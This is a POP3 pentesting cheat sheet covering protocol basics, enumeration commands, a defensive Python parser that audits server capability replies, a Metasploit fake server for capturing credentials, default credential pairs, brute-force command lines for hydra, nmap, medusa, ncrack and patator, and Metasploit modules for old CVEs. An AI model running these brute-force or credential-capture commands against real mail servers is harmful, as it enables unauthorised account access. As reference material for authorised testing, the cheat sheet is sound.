POP3
POP3 usually uses ports 110 and 995 (POP3 over TLS).
What is POP3?
POP3 stands for Post Office Protocol (version 3). As the name suggests, it lets you use your email inbox like a post office: emails are downloaded onto your computer and removed from the mail server. When you access your mail over POP3, a copy of each message is created and stored locally on your computer. The originals are usually, but not always, removed from the mail server. In other words, emails become tied to the specific device: once a message has been downloaded onto one device (and removed from the mail server), it cannot be accessed by another email client or device.
```
PORT    STATE SERVICE VERSION
110/tcp open  pop3    Zimbra Collabration Suite pop3d
```
POP3 Pentesting
Enumeration
Banner Grabbing
```bash
telnet 10.10.x.x 110
nc -nv 10.10.x.x 110
nmap -p110 --script=banner 10.10.x.x
nmap -p110 --script=pop3-ntlm-info 10.10.x.x
msf > use auxiliary/scanner/pop3/pop3_version   # Metasploit Framework
openssl s_client -connect <IP>:995 -crlf -quiet  # banner over TLS (POP3S)
```
Capabilities
```bash
# Both are default scripts
nmap --script "pop3-capabilities or pop3-ntlm-info" -sV -p 110 192.168.x.x
# Retrieve POP3 server capabilities (CAPA, TOP, USER, SASL, RESP-CODES, LOGIN-DELAY, PIPELINING, EXPIRE, UIDL, IMPLEMENTATION)
nmap -v -sV --version-intensity=5 --script pop3-capabilities -p T:110 192.168.x.x
```
The pop3-ntlm-info script returns some sensitive data from the NTLM challenge, such as the Windows version of the server.
POP3 Commands
```
POP commands:
USER uid         Log in as "uid"
PASS password    Substitute "password" for your actual password
STAT             List number of messages, total mailbox size
LIST             List messages and sizes
RETR n           Show message n
DELE n           Mark message n for deletion
RSET             Undo any changes
QUIT             Logout (expunges messages if no RSET)
TOP msg n        Show first n lines of message number msg
CAPA             Get capabilities
```
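The capability list above and these commands share one reply format: a `+OK`/`-ERR` status line, optionally followed by a multi-line body that ends with a lone `.` and byte-stuffs data lines starting with a dot. The parser below, an added example that is not from the original page, reads that format and audits what a CAPA reply advertises from a hardening point of view (missing STLS on port 110, plaintext USER/PASS, no LOGIN-DELAY); the server replies are constructed and the finding texts are my own wording.

```python
import io

def read_status(reader):
    """Read one status line; RFC 1939 replies start with '+OK' or '-ERR'."""
    line = reader.readline()
    if not line:
        raise ConnectionError("server closed the connection")
    line = line.rstrip(b"\r\n")
    if line.startswith(b"+OK"):
        return True, line[3:].strip().decode("latin-1")
    if line.startswith(b"-ERR"):
        return False, line[4:].strip().decode("latin-1")
    raise ValueError(f"malformed status line: {line!r}")

def read_multiline(reader):
    """Read a multi-line body (CAPA, LIST, RETR, TOP): ends at a lone '.', and '..' unstuffs to '.'."""
    lines = []
    while True:
        line = reader.readline()
        if not line:
            raise ConnectionError("connection closed before the terminating '.'")
        line = line.rstrip(b"\r\n")
        if line == b".":
            return lines
        lines.append(line[1:] if line.startswith(b"..") else line)

def parse_response(raw):
    """Parse one complete reply held in bytes; on a live server feed sock.makefile('rb') to the readers above."""
    reader = io.BytesIO(raw)
    ok, text = read_status(reader)
    return ok, text, (read_multiline(reader) if ok else [])

def audit_capa_reply(raw, port):
    """Defender check: which weak settings does this CAPA reply advertise? Returns (capabilities, findings)."""
    _, _, lines = parse_response(raw)
    caps = {l.split()[0].decode("latin-1").upper() for l in lines if l.strip()}
    findings = []
    if port == 110 and "STLS" not in caps:
        findings.append("no STLS on port 110: logins cross the wire in cleartext")
    if "USER" in caps:
        findings.append("USER advertised: plaintext USER/PASS login is enabled")
    if "LOGIN-DELAY" not in caps:
        findings.append("LOGIN-DELAY not advertised: no minimum gap between logins is promised")
    return caps, findings

# Constructed server output (not captured from any real host).
SAMPLE_CAPA = (b"+OK Capability list follows\r\nTOP\r\nUSER\r\nSASL PLAIN\r\n"
               b"RESP-CODES\r\nUIDL\r\nIMPLEMENTATION example-pop3d\r\n.\r\n")
SAMPLE_RETR = b"+OK 49 octets\r\nSubject: test\r\n\r\nline one\r\n..starts with a dot\r\n.\r\n"
```

Running `audit_capa_reply(SAMPLE_CAPA, 110)` reports all three findings for the constructed server, while a reply advertising STLS and LOGIN-DELAY without USER reports none.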
Capturing POP3 Credentials
```bash
msf > use auxiliary/server/capture/pop3   # Metasploit Framework: fake POP3 server that logs submitted logins
```
POP3 Credentials
Authentication Checking (common default credentials)
| USER | PASS |
|---|---|
| admin | admin |
| root | root |
| root | toor |
Brute Forcing
```bash
hydra -l USERNAME -P /path/to/passwords.txt -f <IP> pop3 -V
hydra -S -v -l USERNAME -P /path/to/passwords.txt -s 995 -f <IP> pop3 -V
hydra -t 2 -L users.list -P passwords.list -M 10.10.x.x.list -s 110 pop3
# Try to bruteforce POP3 accounts with Nmap's pop3-brute script
nmap --script pop3-brute --script-args userdb=users.list,passdb=passwords.list -p T:110 IP
nmap --script pop3-brute --script-args pop3loginmethod=SASL-LOGIN -p T:110 IP
nmap --script pop3-brute --script-args pop3loginmethod=SASL-CRAM-MD5 -p T:110 IP
nmap --script pop3-brute --script-args pop3loginmethod=APOP -p T:110 IP
msf > use auxiliary/scanner/pop3/pop3_login   # Metasploit Framework
medusa -t 2 -T 2 -U users.list -P passwords.list -H 10.10.x.x.list -n 110 -M pop3
ncrack -g CL=2 -U users.list -P passwords.list -iL 10.10.x.x.list -p pop3:110 -oA output
# FILE0 is the users list and FILE1 the passwords list
patator pop3_login host=10.10.x.x user=FILE0 password=FILE1 0=users.list 1=passwords.list -x ignore:fgrep='incorrect password or account name'
```
POP3 Vulnerabilities
```bash
# Seattle Lab Mail 5.5 [CVE-2003-0264]
msf > use exploit/windows/pop3/seattlelab_pass   # Metasploit Framework
# Exploit-DB: 638.py, 643.c, 646.c
# Cyrus - Gentoo 2006.0 Linux 2.6 [CVE-2006-2502]
msf > use exploit/linux/pop3/cyrus_pop3d_popsubfolders   # Metasploit Framework
```
Reference: https://secybr.com/posts/pop3-pentesting-best-practices/